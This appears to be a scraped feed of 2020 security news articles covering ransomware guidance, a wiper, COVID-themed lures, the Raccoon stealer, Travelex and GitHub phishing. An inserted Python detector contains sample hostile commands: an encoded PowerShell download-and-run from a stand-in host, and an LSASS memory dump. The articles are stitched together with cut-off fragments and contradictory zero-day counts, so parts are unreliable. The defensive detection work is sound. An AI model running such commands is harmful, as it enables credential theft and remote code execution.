Microsoft releases guidance on blocking ransomware attacks
Microsoft has issued a warning about active human-operated ransomware campaigns aimed at healthcare organizations and critical services. To prevent new breaches, the company emphasizes the importance of patching vulnerable internet-facing systems.
Many such attacks start with the human operators first exploiting vulnerabilities found in internet-facing network devices or by brute-forcing RDP servers and then deploying the ransomware payloads.
Pulse VPN devices have previously been exploited by cybercriminals, notably being linked to the Travelex ransomware attack orchestrated by the Sodinokibi (REvil) group.
Other ransomware gangs such as DoppelPaymer and Ragnarok Ransomware also exploited the Citrix ADC (NetScaler) CVE-2019-19781 vulnerability to gain a foothold on the edge of their victims' networks.
Microsoft explains that before deploying ransomware and encrypting systems, attackers typically conduct a reconnaissance phase. During this stage, they steal sensitive data for potential blackmail, gather credentials, and move laterally within the victims' networks.
To safeguard against ransomware attacks, Microsoft recommends that potential victims take proactive measures to mitigate vulnerabilities that threat actors typically exploit.
Reduce the risk of being a ransomware victim
"Applying security patches for internet-facing systems is critical in preventing these attacks," the Microsoft Threat Protection Intelligence Team explains.
From data acquired by Microsoft following recent ransomware attacks, the malicious actors commonly take advantage of these security gaps:
• Remote Desktop Protocol (RDP) or Virtual Desktop endpoints without multi-factor authentication (MFA)
• Older platforms that have reached end of support and are no longer getting security updates, such as Windows Server 2003 and Windows Server 2008, exacerbated by the use of weak passwords
• Misconfigured web servers, including IIS, electronic health record (EHR) software, backup servers, or systems management servers
• Citrix Application Delivery Controller (ADC) systems affected by CVE-2019-19781
• Pulse Secure VPN systems affected by CVE-2019-11510
Despite no recent attacks targeting the CVE-2019-0604 (Microsoft SharePoint), CVE-2020-0688 (Microsoft Exchange), and CVE-2020-10189 (Zoho ManageEngine) vulnerabilities, Microsoft warns that these vulnerabilities may eventually be exploited to infiltrate victims' networks. Therefore, it is crucial to review and apply patches for these vulnerabilities to enhance security.
Detecting and responding to ongoing attacks
Organizations must actively monitor for indicators of ransomware attacks in their environments, including tools that facilitate these attacks while mimicking legitimate red team activity, such as malicious PowerShell and Cobalt Strike. Additionally, they should be vigilant for signs of credential theft and any tampering with security logs.
Once any such signs are detected, organizations' security operations teams should immediately take the following actions to assess the security impact and prevent the payloads from being deployed:
− Investigate affected endpoints and credentials
− Inspect and rebuild devices with related malware infections
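As an added illustration of the monitoring recommended above (this is example code, not part of Microsoft's guidance or the article), the following Python triages constructed Windows event samples for three of the signals named: cleared security logs, encoded PowerShell stagers, and LSASS memory dumping. The event shape, hostnames and command lines are constructed for the demo, not real telemetry.

```python
"""Triage constructed Windows event samples for the ransomware precursors named above."""
import base64
import re

# Tokens that commonly appear in PowerShell download/execution stagers.
CRADLE_TOKENS = ("downloadstring", "downloadfile", "iex", "invoke-expression",
                 "frombase64string", "invoke-webrequest")
# Tokens that commonly appear when lsass.exe memory is dumped for credential theft.
LSASS_DUMP_TOKENS = ("procdump", "comsvcs", "minidump", "rundll32")

# -EncodedCommand and its abbreviations (-enc, -ec, -e) followed by base64.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(b64).decode("utf-16le", errors="replace")
    except ValueError:
        return None


def triage_event(ev):
    """Return a list of (rule, detail) findings for one event dict."""
    findings = []
    eid = ev.get("EventID")
    if eid == 1102:  # Security: the audit log was cleared
        findings.append(("log_tampering", f"Security audit log cleared by {ev.get('SubjectUserName')}"))
    elif eid == 104:  # System: an event log was cleared
        findings.append(("log_tampering", f"{ev.get('Channel')} log cleared"))
    elif eid == 4688:  # Security: a new process has been created
        image = ev.get("NewProcessName", "").lower()
        cmd = ev.get("CommandLine", "")
        if image.endswith(("powershell.exe", "pwsh.exe")):
            decoded = decode_encoded_command(cmd)
            if decoded is not None:
                findings.append(("encoded_powershell", decoded.strip()))
                if any(t in decoded.lower() for t in CRADLE_TOKENS):
                    findings.append(("download_cradle", decoded.strip()))
        low = cmd.lower()
        if "lsass" in low and any(t in low for t in LSASS_DUMP_TOKENS):
            findings.append(("credential_dumping", cmd))
    return findings


def triage(events):
    """Run every event through the rules; return a list of (Computer, rule, detail)."""
    out = []
    for ev in events:
        for rule, detail in triage_event(ev):
            out.append((ev.get("Computer"), rule, detail))
    return out


def _ps_encode(script):
    """Encode a script the way -EncodedCommand expects (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events in a simplified dict shape (not real Microsoft telemetry).
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _ps_encode("IEX (New-Object Net.WebClient).DownloadString('http://stager.invalid/a')")},
    {"EventID": 4688, "Computer": "WS01", "SubjectUserName": "alice",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -ep bypass -File C:\\scripts\\inventory.ps1"},  # benign
    {"EventID": 4688, "Computer": "DC01", "SubjectUserName": "svc_backup",
     "NewProcessName": r"C:\tools\procdump.exe",
     "CommandLine": "procdump.exe -accepteula -ma lsass.exe C:\\temp\\lsass.dmp"},
    {"EventID": 1102, "Computer": "DC01", "SubjectUserName": "svc_backup"},
    {"EventID": 104, "Computer": "FS01", "Channel": "System"},
]

if __name__ == "__main__":
    for host, rule, detail in triage(SAMPLE_EVENTS):
        print(f"{host:5} {rule:20} {detail[:70]}")
```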
To defend against ransomware attacks, it is crucial to identify and address any internet-facing vulnerabilities by locating perimeter systems that attackers might exploit to gain access to networks.
Systems that ransomware attackers might try to abuse during their attacks:
− RDP or Virtual Desktop endpoints without MFA
− Citrix ADC systems affected by CVE-2019-19781
− Pulse Secure VPN systems affected by CVE-2019-11510
− Microsoft SharePoint servers affected by CVE-2019-0604
− Microsoft Exchange servers affected by CVE-2020-0688
− Zoho ManageEngine systems affected by CVE-2020-10189
Ransomware gangs maintain access to victims' networks for months
In early April 2020, numerous ransomware groups that had been steadily infiltrating and establishing a foothold in targeted networks for months launched a series of ransomware attacks, according to Microsoft.
Recent ransomware attacks have targeted a wide range of sectors, including aid organizations, medical billing companies, manufacturing, transportation, government institutions, and educational software providers. This highlights the alarming disregard these ransomware groups have for essential services, even amidst a global crisis.
All government and private organizations, not just healthcare and critical services, are at risk of ransomware attacks. Therefore, it is essential for these entities to implement proactive measures to reduce vulnerabilities and ensure they are prepared to respond effectively at any moment.
According to Microsoft's threat intelligence data, the infiltration of ransomware into organizations' networks began in early 2020, with attackers strategically delaying the deployment of ransomware payloads to maximize their financial gain.
Attack techniques used by ransomware gangs (Microsoft)
Microsoft notes that unlike quicker ransomware attacks typically delivered through email, which often see deployment within an hour, the attacks observed in April resemble the Doppelpaymer ransomware campaigns from 2019. In these cases, attackers infiltrated networks months ahead of launching their ransomware.
"They then remained relatively dormant within environments until they identified an opportune time to deploy ransomware.
"On networks where attackers deployed ransomware, they deliberately maintained their presence on some endpoints, intending to reinitiate malicious activity after ransom is paid or systems are rebuilt."
Many of these groups, although only a handful have gained fame for selling data, were still seen accessing and extracting information during their attacks, even if they have not yet marketed or sold this data.
In early March, Microsoft revealed insights into the entry points and post-exploitation methods utilized by the operators of DoppelPaymer, Dharma, and Ryuk ransomware. The findings highlighted a significant overlap in the security misconfigurations exploited by these threat actors during their damaging ransom attacks.
Since April 1, Microsoft has also been alerting hospitals about vulnerable public-facing VPN devices and gateways on their networks.
During the RSA security conference, the FBI revealed that victims have paid over $140 million to ransomware operators in the past six years, highlighting the significant impact of ransomware attacks. This analysis was based on collected cryptocurrency wallets and ransom notes, showcasing the financial toll on those affected.
Source: https://www.bleepingcomputer.com/news/security/microsoft-releases-guidance-on-blocking-ransomware-attacks/
Wiper Malware Called “Coronavirus” Spreads Among Windows Victims
Like NotPetya, it overwrites the master boot record to render computers "trashed."
A new Windows malware has emerged that makes disks unusable by overwriting the master boot record (MBR). It takes its cue from the COVID-19 pandemic, calling itself simply “Coronavirus.”
Overwriting the MBR is the same trick that the infamous NotPetya wiper malware used in 2017 in a campaign that caused widespread, global financial damage.
A new malware strain identified by SonicWall Capture Labs is a destructive trojan known as the Coronavirus trojan, which presents victims with a gray screen and a blinking cursor displaying the alarming message, “Your computer has been trashed.” While it is less destructive than other wiper malware, researchers indicate that there is currently no clear solution for this threat.
The COVID-19 pandemic has created new opportunities for cybercriminals, who exploit global fears through phishing attacks that promise financial relief. These malicious actors have even named their malware after the coronavirus, using it as a central theme to deceive victims.
As for the infection routine, the malware can be delivered in any of the usual ways: as a malicious email attachment, file download, fake application and so on.
Upon execution, the malware installs several helper files in a temporary folder, adhering to its pandemic theme. An installer named “coronavirus.bat” initiates the attack by creating a hidden folder titled “COVID-19” on the victim's machine, into which the previously dropped files are moved to remain undetected until the malware's objectives are fulfilled.
The installer not only disables Windows Task Manager and User Account Control (UAC) to obscure its activities, but it also changes the victim's wallpaper and prevents any subsequent modifications to it.
It also adds registry entries for persistence, and then reboots the machine to finish the installation.
The process run.exe creates a batch file named run.bat to ensure the registry modifications made by “coronavirus.bat” are kept intact during the reboot, according to SonicWall.
After a reboot, the malware launches two binaries, including “mainWindow.exe,” which presents a window featuring an image of the coronavirus and two buttons. The window warns the victim that “coronavirus has infected your PC!”
The interface features two buttons labeled "Remove virus" and "Help." Clicking the "Remove virus" button has no effect, while the "Help" button triggers a pop-up message advising victims not to waste their time, stating that "you can't terminate this process!"
The other binary carries out the meat of the attack: it is responsible for overwriting the MBR.
Researchers state that the original Master Boot Record (MBR) is backed up in the first sector before being replaced with new code.
Once the overwrite is complete, the victim’s display is changed to a simple grey screen delivering the bad news:
SonicWall informed Threatpost that it successfully analyzed the sample after it was uploaded to VirusTotal, noting that there have been limited occurrences of this issue so far.
“Coronavirus” has been observed in the wild, but little is known about its targeting or about the spreading mechanisms of this mysterious new malware.
The team also told Threatpost that the good news is that this is not as dangerous as other wiper strains.
Even if the Master Boot Record (MBR) is not restored, data can still be accessed by mounting the drive. While it is possible to restore the MBR, doing so is complex and requires advanced technical expertise.
Source: https://threatpost.com/wiper-malware-coronavirus-windows-victims/154368/
3 How Relevance Scoring Can Make Your Threat Intelligence More Actionable
As businesses expand globally, the increasing volume and complexity of cyberattacks pose significant challenges for security analysts. Protecting organizations with multiple international offices, such as those in London, Hong Kong, and Santa Cruz, requires navigating intricate security landscapes. Furthermore, the rapid rise in companies experiencing data breaches, destructive malware, and ransomware highlights the urgent need for robust cybersecurity measures.
High-quality threat intelligence can offer immediate network protection, provide visibility into known threats and significantly reduce the time required for situational investigation or incident response.
Security analysts require automated tools with intelligent rules to efficiently find, organize, and filter relevant information for incident response and threat research. Within the security operations center (SOC), these professionals leverage threat intelligence to differentiate between critical signals and irrelevant noise, swiftly identify genuine issues and their solutions, and prioritize remediation efforts effectively.
Speed is imperative. More specifically, time to decision is everything.
In order to shorten their time to decision, security analysts need to quickly answer key questions, such as:
– What is its potential impact on my organization?
– How do I prioritize it against my backlog?
– What evidence do I have to support my position?
Threat intelligence plays a crucial role in addressing security concerns by providing essential context to ongoing investigations. By utilizing indicator-based threat intelligence, organizations can validate internal observations, while vulnerability-based threat intelligence sheds light on potential risks and their implications for the organization.
However, a key problem for analysts, assuming they have quality threat intelligence, is relevance. How do you know if that threat intelligence is relevant to this situation?
How Relevance Scoring Can Help
Relevance scoring is a method that aligns the characteristics of security analysts’ threat intelligence with their organization's attributes, including industry and location. By pinpointing indicators linked to these specific properties, analysts can prioritize those that are most relevant to their organization when analyzing traffic. Implementing automated tools that utilize relevance scoring could enhance the insights provided, making them more pertinent and actionable for analysts.
Implementing user-specific relevance scoring techniques enhances security tools by delivering timely and contextualized data tailored to an organization's unique industry and region. By sharing sightings with threat intelligence vendors and other organizations, entities can enrich their threat intelligence, ultimately benefiting the broader community they belong to.
Quality threat intelligence combined with local relevance scoring can go directly to the bottom line in the form of faster incident investigation, determination, prioritization and remediation.
Learn how the X-Force Threat Score brings relevance scoring to IBM Security Threat Intelligence Insights.
The post How Relevance Scoring Can Make Your Threat Intelligence More Actionable appeared first on Security Intelligence.
Source: http://feedproxy.google.com/~r/SecurityIntelligence/~3/NhPGN6rYv5k/
4 Emerging MakeFrame Skimmer from Magecart Sets Sights on SMBs
Attacks using brand-new card-harvesting code are targeting small- to medium-sized businesses, claiming 19 sites so far.
Researchers have identified a new skimmer utilized by the Magecart Group, which has been extracting payment card information from 19 different websites, primarily targeting small- and medium-sized businesses (SMBs), over the past few months.
Microsoft: No surge in malicious attacks, just more COVID-19 lures
Microsoft reports that while the overall volume of malicious attacks has not risen, threat actors have adapted existing infrastructure from prior attacks and restructured their campaigns to take advantage of the fears related to the COVID-19 pandemic.
According to Rob Lefferts, Corporate Vice President of Microsoft 365 Security, attackers are not gaining new resources but are instead repurposing their existing tools, such as ransomware and phishing, to exploit COVID-19-related keywords that entice users to click.
Clicking on malicious links can lead to unauthorized access to our inboxes, theft of credentials, and the distribution of more harmful links to colleagues through collaboration tools. Cybercriminals often remain undetected while gathering sensitive information that could yield significant financial gains.
The United States' Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom’s National Cyber Security Centre (NCSC) have also issued a joint alert today about ongoing COVID-19 exploitation.
No surge in attacks, just an influx of rethemed attack campaigns
According to Lefferts, Microsoft's data indicates that cyber attackers have merely rebranded their prior campaigns, utilizing COVID-19 themes to exploit the heightened stress experienced by potential victims during the SARS-CoV-2 pandemic.
Rather than increasing the volume of attacks, malicious actors are adapting their tactics by changing their bait, contrary to the widespread belief that the rise of COVID-19 themed attacks since the outbreak began would bring a surge in cyber threats.
"Our intelligence shows that these attacks are settling into a rhythm that is the normal ebb and flow of the threat environment," Lefferts added.
Malware campaigns adapted to the pandemic (Microsoft)
According to Microsoft's telemetry data, every country has experienced some form of pandemic-themed cyberattack, with the United States, China, and Russia being the primary targets of these threats.
Since the onset of these attacks, Microsoft has identified 76 different threat variants leveraging COVID-19 themed tactics, with the Trickbot and Emotet malware families being particularly active in exploiting the pandemic.
According to Microsoft, approximately 60,000 out of millions of targeted messages include COVID-19 related malicious attachments or URLs, based on data gathered from thousands of email phishing campaigns each week.
"In a single day, SmartScreen sees and processes more than 18,000 malicious COVID-19-themed URLs and IP addresses."
Impact of COVID-19 themed attacks around the world (Microsoft)
Despite the seemingly large number of threats, Microsoft says this represents less than two percent of the total volume it monitors and protects against daily. This indicates that while the overall threat volume remains stable, attackers are adapting their strategies to exploit fear.
Nation-state actors using COVID-19 lures in attacks targeting healthcare have also been spotted by Microsoft security researchers since the start of the pandemic.
Microsoft is sending notifications to dozens of hospitals affected by such attacks and about vulnerable exposed VPN devices and gateways on their networks.
Redmond shares news and guidance related to the pandemic on the company's COVID-
CISA and NCSC joint alert on COVID-19 exploitation
Cybercriminals and advanced persistent threat (APT) groups are exploiting the COVID-19 pandemic to launch attacks on individuals, small and medium enterprises, government agencies, and large organizations, as reported by CISA and NCSC.
Furthermore, "both CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors," the alert says.
"At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations."
Threats observed so far by CISA, NCSC, and the security industry at large include:
− Phishing, using the subject of coronavirus or COVID-19 as a lure,
− Malware distribution, using coronavirus- or COVID-19- themed lures,
− Registration of new domain names containing wording related to coronavirus or COVID-19, and
− Attacks against newly—and often rapidly—deployed remote access and teleworking infrastructure.
CISA and NCSC, in collaboration with industry partners and law enforcement agencies, also provide non-exhaustive lists of COVID-19-related IOCs in CSV and STIX formats.
Guidance to mitigate the risk posed by COVID-19 themed attack campaigns to organizations and individuals is available via the following CISA and NCSC resources:
− CISA guidance for defending against COVID-19 cyber scams
− CISA Insights: Risk Management for Novel Coronavirus (COVID-19), which provides guidance for executives regarding physical, supply chain, and cybersecurity issues related to COVID-19
− CISA Alert: Enterprise VPN Security
− CISA webpage providing a repository of the agency’s COVID-19 guidance
− NCSC guidance to help spot, understand, and deal with suspicious messages and emails
− NCSC phishing guidance for organizations and cyber security professionals
− NCSC guidance on mitigating malware and ransomware attacks
− NCSC guidance on home working
− NCSC guidance on end user device security
Source: https://www.bleepingcomputer.com/news/security/microsoft-no-surge-in-malicious-attacks-just-more-covid-19-lures/
Copycat Site Serves Up Raccoon Stealer
Visitors to the fake site expecting antivirus offerings will instead encounter the Fallout exploit kit and a possible malware infection.
Someone is targeting web denizens with a malicious, copycat Malwarebytes website, which serves up the Raccoon information stealer malware to unsuspecting visitors.
In late March, attackers registered the domain "malwarebytes-free[.]com" through a Russian domain registrar, as reported by Malwarebytes. The security firm told Threatpost that it does not anticipate any communication from either the registrar or the hosting provider, noting that the website remains operational.
Malwarebytes reports that the content of its original site was copied and modified with an added JavaScript snippet that detects the visitor's browser. If the browser is Internet Explorer, the visitor is redirected to a malicious URL linked to the Fallout exploit kit.
Researchers have discovered that the counterfeit Malwarebytes website is also being used in a malvertising campaign through the PopCash ad network. This campaign involves fake Malwarebytes ads displayed on adult websites, which redirect users to the harmful site. The researchers have reported these malicious advertisements to PopCash for further action.
The Fallout exploit kit is employed to infect vulnerable machines with the Raccoon data-harvesting malware, whether visitors arrive through organic search or advertisements. Raccoon meticulously searches for sensitive information, including credit card details, cryptocurrency wallets, passwords, emails, cookies, and system data from popular browsers, such as saved credit card information, URLs, usernames, and passwords, before transmitting this data back to its operator.
The fake site
Raccoon is an emerging malware actively developed by its creators, as highlighted in a recent Cofense analysis. This malware is marketed as a malware-as-a-service on underground forums in both Russian and English, and it comes with 24/7 customer support for users.
First identified in April 2019, the Raccoon malware has been utilized in various campaigns, including a notable instance in November when Cofense reported its ability to bypass anti-spam defenses from Microsoft and Symantec. This was achieved by employing IMG files that were hosted on a Dropbox account controlled by hackers.
According to additional research, the malware had infected hundreds of thousands of Windows systems as of last October.
Malwarebytes analysts discovered that the operators behind the fake-site campaign attempted similar strategies with other security companies, particularly Cloudflare. This effort involved a copycat site that was spread through malvertising techniques.
Researchers at Malwarebytes have identified a potential link between the current threat actor and ongoing adult malvertising campaigns utilizing the Fallout exploit kit. While the attacks are not particularly sophisticated, they have managed to spread across a wide range of ad platforms. Unlike typical malvertising incidents that usually involve one or two ad networks, this threat actor has diversified their traffic sources significantly.
Malwarebytes researchers believe that the targeting of security firms could be a deliberate tactic meant as payback for revealing malvertising activity.
Malwarebytes reports that the remaining malvertising campaigns primarily target second- and third-tier adult websites, often leading to the Fallout or RIG exploit kits, as most threat actors have shifted to different distribution methods. They suggest that the recent faux Malwarebytes malvertising campaign may be retaliation for their ongoing efforts to collaborate with ad networks to track, report, and eliminate such attacks.
Users can protect themselves by keeping their systems fully patched and by double-checking the identity of any website before clicking on an ad or a link.
Source: https://threatpost.com/malwarebytes-copycat-site-raccoon-stealer/154638/
Travelex Pays $2.3M in Bitcoin to Hackers
The payout stems from a system-wide attack that knocked global networks offline on New Year’s Eve and reflects a shift in thinking about ransom payouts.
Travelex paid $2.3 million in Bitcoin to hackers following a malware attack that disrupted its global network and significantly impacted its operations in January.
According to a report by the Wall Street Journal, the decision to pay ransom to threat actors may appear counterintuitive, as experts have traditionally advised companies against such actions during cyber incidents.
The mindset surrounding cyberattacks is evolving, as businesses increasingly recognize that paying ransoms to hackers can be less financially damaging than remaining locked out of their systems due to sophisticated attacks.
Travelex revealed that experts recommended the company pay the perpetrators behind the New Year’s Eve cyberattack, which led to the shutdown of its online services and mobile app. This incident forced retail locations to operate manually, leaving many customers without access to travel money and disrupting global banking partners' ability to buy or sell foreign currency.
Travelex, a prominent foreign-exchange service provider operating in over 70 countries with more than 1,200 retail branches, faced a significant cyberattack that led to the shutdown of its websites in at least 20 countries. This disruption severely impacted Travelex's business operations and created substantial issues for its banking partners, including Barclays, First Direct, HSBC, Sainsbury’s Bank, Tesco, and Virgin Money.
Travelex has consistently updated its partners and regulators regarding the situation following a ransomware attack attributed to the Sodinokibi strain. The attackers demanded a six-figure ransom for the decryption key and directed Travelex to a payment website located in Colorado, as disclosed by the company approximately one week after the incident.
A recent report reveals that most companies affected by ransomware attacks, like Travelex, often choose to pay the hackers, despite such payouts typically remaining undisclosed. This decision is driven by the desire to avoid the significant financial and operational repercussions that can arise from having their networks compromised.
According to the "2020 Cyberthreat Defense Report" by PerimeterX, 62% of the 1,200 IT security professionals surveyed reported that their networks had fallen victim to ransomware attacks, with many ultimately paying the ransom to regain control of their systems.
A Forrester Research report from last year indicated that paying a ransom might be considered a viable business strategy, complementing other recovery efforts. This is particularly relevant because, even with optimal backups, achieving complete recovery of data and systems is often unattainable.
Forrester emphasizes that while it does not endorse paying ransoms, it acknowledges this option as a legitimate recovery strategy that should be considered alongside other recovery efforts. This approach aims to help organizations make informed decisions regarding their recovery paths, according to Forrester Principal Analyst Josh Zelonis.
Organizations, particularly local governments, are increasingly recognizing the importance of cybersecurity, especially in the absence of robust technical support for system recovery. Researchers indicate that these entities face greater financial risks if they choose not to pay ransoms, as the costs associated with system recovery can far exceed the ransom amount.
In June, a Florida city controversially paid $600,000 to hackers to recover data following a ransomware attack, a decision met with criticism from security experts. In contrast, the city of Baltimore faced a significant ransomware attack last year, resulting in an estimated financial impact of $18.2 million, despite the hacker's demand of only $76,000 in bitcoin. Security expert Zelonis described the choice not to pay in Baltimore as "shortsighted," highlighting the potential consequences of such attacks.
As the financial implications of refusing to pay ransom surpass the costs of compliance, high-profile ransomware payouts, similar to Travelex's case, are expected to become increasingly common in the future.
Source: https://threatpost.com/travelex-pays-2-3m-in-bitcoin-to-hackers-who-hijacked-network-in-january/154666/
Microsoft April 2020 Patch Tuesday fixes 4 zero-days, 15 critical flaws
With the release of the April 2020 security updates, Microsoft has released fixes for 113 vulnerabilities in Microsoft products. Of these vulnerabilities, 15 are classified as Critical, 93 as Important, 3 as Moderate, and 2 as Low.
Of particular interest, Microsoft patched three zero-day vulnerabilities, two of which have been seen actively exploited in attacks.
Users should install these security updates as soon as possible to protect Windows from known security risks.
Zero-day vulnerabilities fixed in April 2020
Microsoft has stated that two zero-day vulnerabilities have been publicly disclosed and two have been known to be exploited in the wild.
The publicly released vulnerabilities are:
− CVE-2020-0935 - OneDrive for Windows Elevation of Privilege Vulnerability
− CVE-2020-1020 - Adobe Font Manager Library Remote Code Execution Vulnerability
The publicly exploited vulnerabilities are:
− CVE-2020-0938 - Adobe Font Manager Library Remote Code Execution Vulnerability
− CVE-2020-1020 - Adobe Font Manager Library Remote Code Execution Vulnerability
Patch released for Adobe Font Manager zero-day vulnerabilities
The two zero-day remote code execution vulnerabilities in the Windows Adobe Font Manager Library were previously announced by Microsoft as they were seen being exploited in limited attacks.
These vulnerabilities are tracked as CVE-2020-0938 and CVE-2020-1020, both titled "Adobe Font Manager Library Remote Code Execution Vulnerability", and have the following description:
A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.
An attacker exploiting this vulnerability could execute code remotely on all systems except Windows 10, where the code would run in a restricted AppContainer sandbox with limited privileges and capabilities. Outside that sandbox, the attacker could then install programs, manipulate data, or create new accounts with full user rights.
There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.
Previously, various workarounds were released, such as disabling preview panes and various services, and registry modifications to reduce the security risks or block attacks.
With this security update installed, these workarounds are no longer necessary, and users who applied them should undo them.
The April 2020 Patch Tuesday Security Updates
The April 2020 Patch Tuesday updates come with a complete list of resolved vulnerabilities and released advisories. For detailed descriptions of each vulnerability and the systems impacted, refer to the complete report available here.
Update 4/14/20: Microsoft corrected the CVE-2020-0968 advisory to state that it is not being exploited, so there are only three zero-days this Patch Tuesday.
Source: https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2020-patch-tuesday-fixes-4-zero-days-15-critical-flaws/
12 GitHub accounts stolen in ongoing phishing attacks
GitHub users are currently being targeted by a phishing campaign specifically designed to collect and steal their credentials via landing pages mimicking GitHub's login page.
Besides taking over their accounts, the attackers are also immediately downloading the contents of private repositories, including but not limited to "those owned by organization accounts and other collaborators."
According to GitHub's Security Incident Response Team (SIRT), if an attacker gains access to a user's GitHub account credentials, they can swiftly generate personal access tokens or authorize OAuth applications to maintain access, even if the user subsequently changes their password.
GitHub's SIRT published information on this ongoing phishing campaign, dubbed Sawfish, to increase awareness and allow users who might be targeted to protect their accounts and repositories.
Phishing attack targets active GitHub accounts
Phishing emails employ various tactics to deceive recipients into clicking on malicious links, often claiming unauthorized activity or changes to account settings or repositories.
Users who are deceived into checking their account activity are redirected to a fraudulent GitHub login page, where their credentials are collected and sent to servers controlled by attackers.
Phishing landing pages can capture victims' 2FA codes in real time when they use time-based one-time password (TOTP) mobile apps. This enables attackers to bypass accounts secured with TOTP-based two-factor authentication.
However, "[a]ccounts protected by hardware security keys are not vulnerable to this attack," the Git repository hosting service's SIRT explains.
This ongoing phishing campaign targets currently active GitHub users working for tech companies in multiple countries, using email addresses obtained from public commits.
The phishing emails are delivered from legitimate domains, either using previously compromised email servers or with the help of stolen API credentials for legitimate bulk email service providers.
Attackers in this campaign utilize URL-shortening services to conceal the URLs of their landing pages, often chaining multiple services together for greater obfuscation.
To further make the malicious links used in the attack look less suspicious, the threat actors also use PHP-based redirectors on compromised sites.
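Why a relayed TOTP code is accepted but a security-key assertion from a lookalike page is not: an added example, not code from the BleepingComputer article or from GitHub, showing the relying-party checks that give WebAuthn its origin binding. The RP ID, origin, challenge and seed values are constructed placeholders, and the signature verification step is omitted so the binding checks stand out.

```python
import hashlib
import hmac
import json
import struct

# Constructed values (not from the advisory): the legitimate site and its RP ID.
LEGIT_RP_ID = "github.example"
LEGIT_ORIGIN = "https://github.example"


def totp(secret: bytes, for_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP. Nothing in the code says which site it was typed into."""
    counter = struct.pack(">Q", for_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    value = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{value % (10 ** digits):0{digits}d}"


def totp_accepted(secret: bytes, code: str, now: int) -> bool:
    # A code captured on a phishing page and relayed within the time step verifies.
    return hmac.compare_digest(totp(secret, now), code)


def make_assertion(origin: str, rp_id: str, challenge: str):
    """Constructed stand-in for what browser + authenticator produce on a page at `origin`.
    The browser fills clientDataJSON.origin and derives the RP ID from the page itself."""
    client = json.dumps({"type": "webauthn.get", "challenge": challenge, "origin": origin})
    rp_id_hash = hashlib.sha256(rp_id.encode()).digest()
    flags, sign_count = b"\x01", b"\x00\x00\x00\x01"
    return rp_id_hash + flags + sign_count, client.encode()


def webauthn_assertion_accepted(auth_data: bytes, client_data_json: bytes, expected_challenge: str) -> bool:
    """Relying-party binding checks done before the signature is verified:
    rpIdHash (first 32 bytes of authenticatorData) must be SHA-256 of our RP ID and
    clientDataJSON.origin must be our origin, so an assertion minted on a lookalike
    domain is rejected even if relayed in real time."""
    client = json.loads(client_data_json)
    if client.get("type") != "webauthn.get" or client.get("challenge") != expected_challenge:
        return False
    if client.get("origin") != LEGIT_ORIGIN:
        return False
    expected_hash = hashlib.sha256(LEGIT_RP_ID.encode()).digest()
    return hmac.compare_digest(auth_data[:32], expected_hash)
```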
How to defend against these phishing attacks
Users that haven't configured two-factor authentication for their GitHub accounts using a security key are advised by the Microsoft-owned company to:
− Reset their two-factor recovery codes immediately
− Review their personal access tokens
− Take additional steps to review and secure their accounts
To enhance security against phishing attacks that target two-factor codes, GitHub recommends the use of hardware security keys or WebAuthn two-factor authentication. Additionally, utilizing a browser-integrated password manager can further protect your accounts.
"These provide a degree of phishing protection by auto-filling or otherwise recognizing only a legitimate domain for which you have previously saved a password.
"If your password manager doesn’t recognize the website you’re visiting, it might be a phishing site."
One year ago, attackers were using GitHub's platform to host their phishing kits by abusing the service's free repositories to deliver them via github.io pages.
Source: https://www.bleepingcomputer.com/news/security/github-accounts-stolen-in-ongoing-phishing-attacks/
Business Flexibility Through Digital Trust and Risk Management
In the 1970s, professional football featured formidable defenses that earned unique nicknames, such as the Pittsburgh Steelers' "Steel Curtain," the Miami Dolphins' "No-Name Defense," and the Dallas Cowboys' "Doomsday Defense." The Cowboys' defensive strategy was rooted in the innovative flex defense, introduced by coach Tom Landry in 1964 and refined throughout the following decade.
The flex defense used gap assignments to define players' roles and relied on reading
Players relied on key indicators to anticipate the offense's actions, fostering trust among teammates to maintain their designated gaps. Each player developed the ability to read and react to these indicators, enabling them to predict upcoming plays. They were also trained to adapt their strategies in real time as the play evolved.
The Role of Security in Business Flexibility
Flexibility is a vital competency in business, akin to business continuity planning. Information security teams can enhance this flexibility by establishing a reliable foundation that fosters goodwill and builds confidence. By consistently refining their risk management skills, businesses can better adapt to evolving customer needs while maintaining security, allowing for experimentation and growth.
The rise of data breaches since the beginning of the last decade has significantly impacted the cybersecurity community's confidence in its ability to detect and prevent data loss, while also eroding consumers' trust in the privacy of their personal information. However, trust remains crucial for consumers, as it can lead to highly positive outcomes for businesses that prioritize data security.
To enhance goodwill through trust, companies must embrace a digital trust mindset, prioritize system hygiene, and invest in a robust security function. This approach not only ensures the protection of products and services that customers depend on but also provides the necessary flexibility for business operations.
Engender Digital Trust in Your Organization
